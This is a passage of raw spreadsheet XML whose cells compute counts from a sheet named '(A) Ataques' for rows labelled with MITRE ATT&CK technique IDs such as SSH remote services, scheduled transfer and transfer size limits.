        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!LL9,"")</f>
        <v>51</v>
      </c>
      <c r="BE9" s="510">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!LM9,"")</f>
        <v>24</v>
      </c>
      <c r="BF9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!LN9,"")</f>
        <v>1</v>
      </c>
      <c r="BG9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!LO9,"")</f>
        <v>4</v>
      </c>
      <c r="BH9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!LS9,"")</f>
        <v>23</v>
      </c>
      <c r="BI9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($BD9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ9" s="469">
        <f>'(A) Ataques'!OL9+'(A) Ataques'!OR9+'(A) Ataques'!OX9+'(A) Ataques'!PD9+'(A) Ataques'!PJ9</f>
        <v>1</v>
      </c>
      <c r="BK9" s="510">
        <f>'(A) Ataques'!ON9+'(A) Ataques'!OT9+'(A) Ataques'!OZ9+'(A) Ataques'!PF9+'(A) Ataques'!PL9</f>
        <v>1</v>
      </c>
      <c r="BL9" s="471">
        <f>'(A) Ataques'!OP9+'(A) Ataques'!OV9+'(A) Ataques'!PB9+'(A) Ataques'!PH9+'(A) Ataques'!PN9</f>
        <v>1</v>
      </c>
      <c r="BM9" s="495">
        <f>'(A) Ataques'!OH9</f>
        <v>1</v>
      </c>
      <c r="BN9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($BJ9=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO9" s="469">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!OC9,"")</f>
        <v>1</v>
      </c>
      <c r="BP9" s="510">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!OD9,"")</f>
        <v>1</v>
      </c>
      <c r="BQ9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!OE9,"")</f>
        <v>1</v>
      </c>
      <c r="BR9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!OF9,"")</f>
        <v>1</v>
      </c>
      <c r="BS9" s="471">
        <f>IF('(A) Ataques'!$AP9&lt;&gt;"NO",'(A) Ataques'!OJ9,"")</f>
        <v>1</v>
      </c>
      <c r="BT9" s="331">
        <f>IF('(A) Ataques'!$AK9&lt;&gt;"NO",IF($BO9=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A10" s="79">
        <f t="shared" si="0"/>
        <v>8</v>
      </c>
      <c r="B10" s="4">
        <f>IF('(A) Ataques'!AK10&lt;&gt;"NO",'(A) Ataques'!E10,"")</f>
        <v>7</v>
      </c>
      <c r="C10" s="6" t="str">
        <f>IF('(A) Ataques'!AK10&lt;&gt;"NO",IF('(A) Ataques'!M10="","",'(A) Ataques'!M10),"")</f>
        <v>T1021.004-remote_services_ssh</v>
      </c>
      <c r="D10" s="4" t="str">
        <f>IF('(A) Ataques'!AK10&lt;&gt;"NO",'(A) Ataques'!F10,"")</f>
        <v>T1021</v>
      </c>
      <c r="E10" s="286">
        <f>IF('(A) Ataques'!AK10&lt;&gt;"NO",'(A) Ataques'!AQ10,"")</f>
        <v>1</v>
      </c>
      <c r="F10" s="288">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!BB10,"")</f>
        <v>3</v>
      </c>
      <c r="G10" s="392">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!BD10,"")</f>
        <v>1</v>
      </c>
      <c r="H10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!BF10,"")</f>
        <v>1</v>
      </c>
      <c r="I10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!BG10,"")</f>
        <v>1</v>
      </c>
      <c r="J10" s="530">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($F10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BH10,"")</f>
        <v>0</v>
      </c>
      <c r="L10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BJ10,"")</f>
        <v>0</v>
      </c>
      <c r="M10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BL10,"")</f>
        <v>0</v>
      </c>
      <c r="N10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BM10,"")</f>
        <v>0</v>
      </c>
      <c r="O10" s="532">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($K10=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P10" s="292">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BN10,"")</f>
        <v>3</v>
      </c>
      <c r="Q10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BP10,"")</f>
        <v>1</v>
      </c>
      <c r="R10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BR10,"")</f>
        <v>1</v>
      </c>
      <c r="S10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BS10,"")</f>
        <v>1</v>
      </c>
      <c r="T10" s="530">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($P10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BT10,"")</f>
        <v>4</v>
      </c>
      <c r="V10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BV10,"")</f>
        <v>2</v>
      </c>
      <c r="W10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BX10,"")</f>
        <v>2</v>
      </c>
      <c r="X10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$BY10,"")</f>
        <v>1</v>
      </c>
      <c r="Y10" s="532">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($U10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z10" s="288">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!BZ10,"")</f>
        <v>4</v>
      </c>
      <c r="AA10" s="392">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!CB10,"")</f>
        <v>2</v>
      </c>
      <c r="AB10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!CD10,"")</f>
        <v>2</v>
      </c>
      <c r="AC10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!CE10,"")</f>
        <v>1</v>
      </c>
      <c r="AD10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF(Z10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CF10,"")</f>
        <v>8</v>
      </c>
      <c r="AF10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CH10,"")</f>
        <v>4</v>
      </c>
      <c r="AG10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CJ10,"")</f>
        <v>4</v>
      </c>
      <c r="AH10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CK10,"")</f>
        <v>1</v>
      </c>
      <c r="AI10" s="287">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($AE10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ10" s="292">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CL10,"")</f>
        <v>0</v>
      </c>
      <c r="AK10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CN10,"")</f>
        <v>0</v>
      </c>
      <c r="AL10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CP10,"")</f>
        <v>0</v>
      </c>
      <c r="AM10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CQ10,"")</f>
        <v>0</v>
      </c>
      <c r="AN10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($AJ10=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CR10,"")</f>
        <v>1</v>
      </c>
      <c r="AP10" s="322">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CT10,"")</f>
        <v>1</v>
      </c>
      <c r="AQ10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CV10,"")</f>
        <v>1</v>
      </c>
      <c r="AR10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!$CW10,"")</f>
        <v>1</v>
      </c>
      <c r="AS10" s="287">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($AO10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT10" s="288">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!CX10,"")</f>
        <v>4</v>
      </c>
      <c r="AU10" s="392">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!CZ10,"")</f>
        <v>2</v>
      </c>
      <c r="AV10" s="4">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!DB10,"")</f>
        <v>2</v>
      </c>
      <c r="AW10" s="20">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",'(A) Ataques'!DC10,"")</f>
        <v>1</v>
      </c>
      <c r="AX10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($AT10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY10" s="469">
        <f>'(A) Ataques'!LU10+'(A) Ataques'!MA10+'(A) Ataques'!MG10+'(A) Ataques'!MM10+'(A) Ataques'!MS10</f>
        <v>1</v>
      </c>
      <c r="AZ10" s="510">
        <f>'(A) Ataques'!LW10+'(A) Ataques'!MC10+'(A) Ataques'!MI10+'(A) Ataques'!MO10+'(A) Ataques'!MU10</f>
        <v>1</v>
      </c>
      <c r="BA10" s="471">
        <f>'(A) Ataques'!LY10+'(A) Ataques'!ME10+'(A) Ataques'!MK10+'(A) Ataques'!MQ10+'(A) Ataques'!MW10</f>
        <v>1</v>
      </c>
      <c r="BB10" s="471">
        <f>'(A) Ataques'!LQ10</f>
        <v>1</v>
      </c>
      <c r="BC10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($AY10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD10" s="469">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!LL10,"")</f>
        <v>2</v>
      </c>
      <c r="BE10" s="510">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!LM10,"")</f>
        <v>2</v>
      </c>
      <c r="BF10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!LN10,"")</f>
        <v>1</v>
      </c>
      <c r="BG10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!LO10,"")</f>
        <v>1</v>
      </c>
      <c r="BH10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!LS10,"")</f>
        <v>1</v>
      </c>
      <c r="BI10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($BD10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ10" s="469">
        <f>'(A) Ataques'!OL10+'(A) Ataques'!OR10+'(A) Ataques'!OX10+'(A) Ataques'!PD10+'(A) Ataques'!PJ10</f>
        <v>1</v>
      </c>
      <c r="BK10" s="510">
        <f>'(A) Ataques'!ON10+'(A) Ataques'!OT10+'(A) Ataques'!OZ10+'(A) Ataques'!PF10+'(A) Ataques'!PL10</f>
        <v>1</v>
      </c>
      <c r="BL10" s="471">
        <f>'(A) Ataques'!OP10+'(A) Ataques'!OV10+'(A) Ataques'!PB10+'(A) Ataques'!PH10+'(A) Ataques'!PN10</f>
        <v>1</v>
      </c>
      <c r="BM10" s="495">
        <f>'(A) Ataques'!OH10</f>
        <v>1</v>
      </c>
      <c r="BN10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($BJ10=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO10" s="469">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!OC10,"")</f>
        <v>1</v>
      </c>
      <c r="BP10" s="510">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!OD10,"")</f>
        <v>1</v>
      </c>
      <c r="BQ10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!OE10,"")</f>
        <v>1</v>
      </c>
      <c r="BR10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!OF10,"")</f>
        <v>1</v>
      </c>
      <c r="BS10" s="471">
        <f>IF('(A) Ataques'!$AP10&lt;&gt;"NO",'(A) Ataques'!OJ10,"")</f>
        <v>1</v>
      </c>
      <c r="BT10" s="331">
        <f>IF('(A) Ataques'!$AK10&lt;&gt;"NO",IF($BO10=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A11" s="79">
        <f t="shared" si="0"/>
        <v>9</v>
      </c>
      <c r="B11" s="4">
        <f>IF('(A) Ataques'!AK11&lt;&gt;"NO",'(A) Ataques'!E11,"")</f>
        <v>8</v>
      </c>
      <c r="C11" s="6" t="str">
        <f>IF('(A) Ataques'!AK11&lt;&gt;"NO",IF('(A) Ataques'!M11="","",'(A) Ataques'!M11),"")</f>
        <v>T1029-Scheduled_transfer</v>
      </c>
      <c r="D11" s="4" t="str">
        <f>IF('(A) Ataques'!AK11&lt;&gt;"NO",'(A) Ataques'!F11,"")</f>
        <v>T1029</v>
      </c>
      <c r="E11" s="286">
        <f>IF('(A) Ataques'!AK11&lt;&gt;"NO",'(A) Ataques'!AQ11,"")</f>
        <v>9</v>
      </c>
      <c r="F11" s="288">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!BB11,"")</f>
        <v>5</v>
      </c>
      <c r="G11" s="392">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!BD11,"")</f>
        <v>2</v>
      </c>
      <c r="H11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!BF11,"")</f>
        <v>2</v>
      </c>
      <c r="I11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!BG11,"")</f>
        <v>1</v>
      </c>
      <c r="J11" s="530">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($F11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BH11,"")</f>
        <v>3</v>
      </c>
      <c r="L11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BJ11,"")</f>
        <v>3</v>
      </c>
      <c r="M11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BL11,"")</f>
        <v>3</v>
      </c>
      <c r="N11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BM11,"")</f>
        <v>1</v>
      </c>
      <c r="O11" s="532">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($K11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P11" s="292">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BN11,"")</f>
        <v>8</v>
      </c>
      <c r="Q11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BP11,"")</f>
        <v>5</v>
      </c>
      <c r="R11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BR11,"")</f>
        <v>5</v>
      </c>
      <c r="S11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BS11,"")</f>
        <v>2</v>
      </c>
      <c r="T11" s="530">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($P11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BT11,"")</f>
        <v>63</v>
      </c>
      <c r="V11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BV11,"")</f>
        <v>8</v>
      </c>
      <c r="W11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BX11,"")</f>
        <v>4</v>
      </c>
      <c r="X11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$BY11,"")</f>
        <v>7</v>
      </c>
      <c r="Y11" s="532">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($U11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z11" s="288">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!BZ11,"")</f>
        <v>7</v>
      </c>
      <c r="AA11" s="392">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!CB11,"")</f>
        <v>5</v>
      </c>
      <c r="AB11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!CD11,"")</f>
        <v>5</v>
      </c>
      <c r="AC11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!CE11,"")</f>
        <v>1</v>
      </c>
      <c r="AD11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF(Z11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CF11,"")</f>
        <v>70</v>
      </c>
      <c r="AF11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CH11,"")</f>
        <v>13</v>
      </c>
      <c r="AG11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CJ11,"")</f>
        <v>9</v>
      </c>
      <c r="AH11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CK11,"")</f>
        <v>7</v>
      </c>
      <c r="AI11" s="287">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($AE11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ11" s="292">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CL11,"")</f>
        <v>0</v>
      </c>
      <c r="AK11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CN11,"")</f>
        <v>0</v>
      </c>
      <c r="AL11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CP11,"")</f>
        <v>0</v>
      </c>
      <c r="AM11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CQ11,"")</f>
        <v>0</v>
      </c>
      <c r="AN11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($AJ11=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CR11,"")</f>
        <v>20</v>
      </c>
      <c r="AP11" s="322">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CT11,"")</f>
        <v>5</v>
      </c>
      <c r="AQ11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CV11,"")</f>
        <v>1</v>
      </c>
      <c r="AR11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!$CW11,"")</f>
        <v>5</v>
      </c>
      <c r="AS11" s="287">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($AO11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AT11" s="288">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!CX11,"")</f>
        <v>28</v>
      </c>
      <c r="AU11" s="392">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!CZ11,"")</f>
        <v>10</v>
      </c>
      <c r="AV11" s="4">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!DB11,"")</f>
        <v>6</v>
      </c>
      <c r="AW11" s="20">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",'(A) Ataques'!DC11,"")</f>
        <v>7</v>
      </c>
      <c r="AX11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($AT11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY11" s="469">
        <f>'(A) Ataques'!LU11+'(A) Ataques'!MA11+'(A) Ataques'!MG11+'(A) Ataques'!MM11+'(A) Ataques'!MS11</f>
        <v>4</v>
      </c>
      <c r="AZ11" s="510">
        <f>'(A) Ataques'!LW11+'(A) Ataques'!MC11+'(A) Ataques'!MI11+'(A) Ataques'!MO11+'(A) Ataques'!MU11</f>
        <v>3</v>
      </c>
      <c r="BA11" s="471">
        <f>'(A) Ataques'!LY11+'(A) Ataques'!ME11+'(A) Ataques'!MK11+'(A) Ataques'!MQ11+'(A) Ataques'!MW11</f>
        <v>3</v>
      </c>
      <c r="BB11" s="471">
        <f>'(A) Ataques'!LQ11</f>
        <v>2</v>
      </c>
      <c r="BC11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($AY11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD11" s="469">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!LL11,"")</f>
        <v>11</v>
      </c>
      <c r="BE11" s="510">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!LM11,"")</f>
        <v>10</v>
      </c>
      <c r="BF11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!LN11,"")</f>
        <v>3</v>
      </c>
      <c r="BG11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!LO11,"")</f>
        <v>3</v>
      </c>
      <c r="BH11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!LS11,"")</f>
        <v>7</v>
      </c>
      <c r="BI11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($BD11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ11" s="469">
        <f>'(A) Ataques'!OL11+'(A) Ataques'!OR11+'(A) Ataques'!OX11+'(A) Ataques'!PD11+'(A) Ataques'!PJ11</f>
        <v>5</v>
      </c>
      <c r="BK11" s="510">
        <f>'(A) Ataques'!ON11+'(A) Ataques'!OT11+'(A) Ataques'!OZ11+'(A) Ataques'!PF11+'(A) Ataques'!PL11</f>
        <v>3</v>
      </c>
      <c r="BL11" s="471">
        <f>'(A) Ataques'!OP11+'(A) Ataques'!OV11+'(A) Ataques'!PB11+'(A) Ataques'!PH11+'(A) Ataques'!PN11</f>
        <v>3</v>
      </c>
      <c r="BM11" s="495">
        <f>'(A) Ataques'!OH11</f>
        <v>2</v>
      </c>
      <c r="BN11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($BJ11=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO11" s="469">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!OC11,"")</f>
        <v>5</v>
      </c>
      <c r="BP11" s="510">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!OD11,"")</f>
        <v>3</v>
      </c>
      <c r="BQ11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!OE11,"")</f>
        <v>3</v>
      </c>
      <c r="BR11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!OF11,"")</f>
        <v>2</v>
      </c>
      <c r="BS11" s="471">
        <f>IF('(A) Ataques'!$AP11&lt;&gt;"NO",'(A) Ataques'!OJ11,"")</f>
        <v>2</v>
      </c>
      <c r="BT11" s="331">
        <f>IF('(A) Ataques'!$AK11&lt;&gt;"NO",IF($BO11=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A12" s="79">
        <f t="shared" si="0"/>
        <v>10</v>
      </c>
      <c r="B12" s="4">
        <f>IF('(A) Ataques'!AK12&lt;&gt;"NO",'(A) Ataques'!E12,"")</f>
        <v>9</v>
      </c>
      <c r="C12" s="6" t="str">
        <f>IF('(A) Ataques'!AK12&lt;&gt;"NO",IF('(A) Ataques'!M12="","",'(A) Ataques'!M12),"")</f>
        <v>T1030-Transfer_Size_Limits</v>
      </c>
      <c r="D12" s="4" t="str">
        <f>IF('(A) Ataques'!AK12&lt;&gt;"NO",'(A) Ataques'!F12,"")</f>
        <v>T1030</v>
      </c>
      <c r="E12" s="286">
        <f>IF('(A) Ataques'!AK12&lt;&gt;"NO",'(A) Ataques'!AQ12,"")</f>
        <v>68</v>
      </c>
      <c r="F12" s="288">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!BB12,"")</f>
        <v>63</v>
      </c>
      <c r="G12" s="392">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!BD12,"")</f>
        <v>32</v>
      </c>
      <c r="H12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!BF12,"")</f>
        <v>1</v>
      </c>
      <c r="I12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!BG12,"")</f>
        <v>32</v>
      </c>
      <c r="J12" s="530">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($F12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BH12,"")</f>
        <v>1</v>
      </c>
      <c r="L12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BJ12,"")</f>
        <v>1</v>
      </c>
      <c r="M12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BL12,"")</f>
        <v>1</v>
      </c>
      <c r="N12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BM12,"")</f>
        <v>1</v>
      </c>
      <c r="O12" s="532">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($K12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="P12" s="292">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BN12,"")</f>
        <v>64</v>
      </c>
      <c r="Q12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BP12,"")</f>
        <v>33</v>
      </c>
      <c r="R12" s="4">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BR12,"")</f>
        <v>2</v>
      </c>
      <c r="S12" s="20">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BS12,"")</f>
        <v>32</v>
      </c>
      <c r="T12" s="530">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",IF($P12=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BT12,"")</f>
        <v>63</v>
      </c>
      <c r="V12" s="322">
        <f>IF('(A) Ataques'!$AK12&lt;&gt;"NO",'(A) Ataques'!$BV12,"")</f>
        <v>32</v>
      </c>
      <c r="W12" s="4">
